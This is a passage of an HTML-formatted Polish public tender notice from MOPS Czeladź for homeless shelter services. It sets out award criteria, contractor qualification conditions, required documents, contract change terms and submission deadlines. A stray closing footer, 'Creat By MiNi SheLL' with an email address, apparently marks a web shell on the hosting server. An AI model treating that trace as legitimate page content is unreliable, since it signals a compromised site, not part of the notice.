zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby MOPS w Czeladzi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale IX SWZ oraz spełniają określone przez zamawiającego warunki udziału<br/>w postępowaniu.<br/>2. Na podstawie art. 112 ustawy pzp, o udzielnie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym: zamawiający nie formułuje warunku udziału<br/>w postępowaniu w tym zakresie<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Dla części I, części II, części III, części IV wykonawca musi być wpisany do rejestru miejsc, w których gminy udzielają tymczasowego schronienia osobom bezdomnym prowadzonego przez Wojewodę<br/>c) sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w powyższym zakresie<br/>d) zdolności technicznej lub zawodowej: zamawiający wymaga aby wykonawca wykazał, że w ciągu 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje należycie zamówienie, którego przedmiotem było lub jest świadczenie usług schronienia dla osób bezdomnych. Wykonawca spełni warunek na poziomie minimalnym, jeżeli wykaże, że:<br/>dla części I - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 10 mężczyzn bezdomnych<br/>dla części II - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 1 kobiety bezdomnej<br/>dla części III - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 1 osoby (kobiety lub mężczyzny) bezdomnej z usługami opiekuńczymi<br/>dla części IV - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia noclegu osobom bezdomnym w noclegowni dla co najmniej 1 osoby (kobiety lub mężczyzny) bezdomnej<br/><br/>W przypadku składania oferty na wszystkie cztery części wykonawca winien wykazać minimum po jednej usłudze potwierdzającej odpowiednio spełnienie warunku odrębnie dla części I, części II, części III,<br/>części IV<br/><br/>3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielnie zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, dopuszcza łączne spełnienie warunku przez wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych przez wykonawcę w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dowód, że podmiot jest wpisany do Rejestru placówek udzielających tymczasowego schronienia prowadzonego przez Wojewodę;<br/>b) dla podmiotów działających na podstawie przepisów o stosunku Państwa do Kościoła Katolickiego oraz innych kościołów i związków wyznaniowych, obowiązkowym dokumentem jest kopia dekretu o mianowaniu księdza na proboszcza parafii, pełnomocnictwo lub upoważnienie zarządu głównego wydane dla osób go reprezentujących z oddziałów terenowych nieposiadających osobowości prawnej;<br/>c) w przypadku fundacji i stowarzyszeń – aktualny, zgodny ze stanem faktycznym wypis z Krajowego Rejestru Sądowego;<br/>d) odpis statutu;<br/>e) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usług zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn nienależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia w którym upływa termin składania ofert. Wzór wykazu usług stanowi Załącznik nr 5 do SWZ; jeżeli wykonawca powołuje się na doświadczenie<br/>w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa powyżej dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/><br/>UWAGA!<br/>1. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>a) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 pzp dane umożliwiające dostęp do tych środków;<br/>b) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ustawy pzp.<br/>2. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>3. W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w Rozdziale X pkt I ppkt 2 składa przynajmniej jeden z wykonawców lub wszyscy wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta (w orygi) składana jest pod rygorem nieważności w formie elektr.lub w postaci elektron. opatrzonej kwalifik. podpisem elektro., podpisem zaufanym lub podpisem osobistym. Ofertę należy sporządzić na formularzu, stan. Zał nr1 do nin. SWZ. 2. Ośw. o speł. warun. u. w postę. (w orygi) w zakresie wskazanym w Roz. VIII pkt 2., SWZ – Zał.nr2 do SWZ. Oświad. to stanowi dow. Potwierdz. spełnianie warunków udziału w postęp. na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w Roz. X pkt II do SWZ. Oświadczenie, o którym mowa powyżej, składa (wraz z ofertą) oddzielnie:- każdy z Wyk. wspólnie ubiegających się o zam. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wyk. oraz spełnianie warunków udziału w postęp. w zakresie, w jakim każdy z wykon. wykazuje spełnianie warunków udziału w postęp; - podmiot udostęp. zasoby, na którego potencjał powołuje się Wyk. celem potwier. spełniania warunków udziału w postęp. W takim przypadku oświad. potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postęp. w zakresie, w jakim podmiot udostępnia swoje zasoby Wyk. 3. Oświad. o niepodl. Wyklucz. (w orygin.) – na Zał.nr3 w zakresie wskazanym w Rozdziale X SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, w Rozdziale X pkt II do SWZ. Oświadczenie, o którym mowa powyżej wraz z ofertą składa oddzielnie: - każdy z Wykonawców wspólnie ubiegających się o zamówienie. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu; - podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełniania warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy. 4. Upoważnienie (pełnomocnictwo) lub inny dokument, potwierdzający umocowanie do reprezentowania Wykonawcy (podpisania oferty), o ile nie wynika ono z dokumentów rejestrowych Wykonawcy. Powyższy zapis stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby Wykonawcy. 5. Pełnomocnictwo (w orygin.) do reprezentowania Wykonawców ubiegających się wspólnie (konsorcja, spółki cywilne) o przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie). 6. Zobowiąz. podmiotu udostęp. Zas. (w orygin.) (lub inny środek dowodowy) potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres zasobów podmiotu udostępniającego zasoby przy wykonywaniu zamówienia, czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych, wykształcenia lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą – według wzoru stanowiącego zał. nr 4 do SWZ 7. Oświadczenie (w orygin.), z którego wynika, które usługi wykonają poszczególni wykonawcy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówieniowa publicznego. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Warunek dotyczy uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp, zostanie spełniony, jeżeli co najmniej jeden<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3. W odniesieniu do warunków dotyczący wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych<br/>z wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 2 i 3, wykonawcy wspólnie ubiegających się o dzielnie zamówienia dołączają odpowiednio do oferty oświadczenie z którego wynika, które usługi wykonują poszczególni wykonawcy. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w oparciu o art. 454 i art. 455 pzp w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, zgodnie z warunkami zawartymi w Załączniku nr 7 i 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-13 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com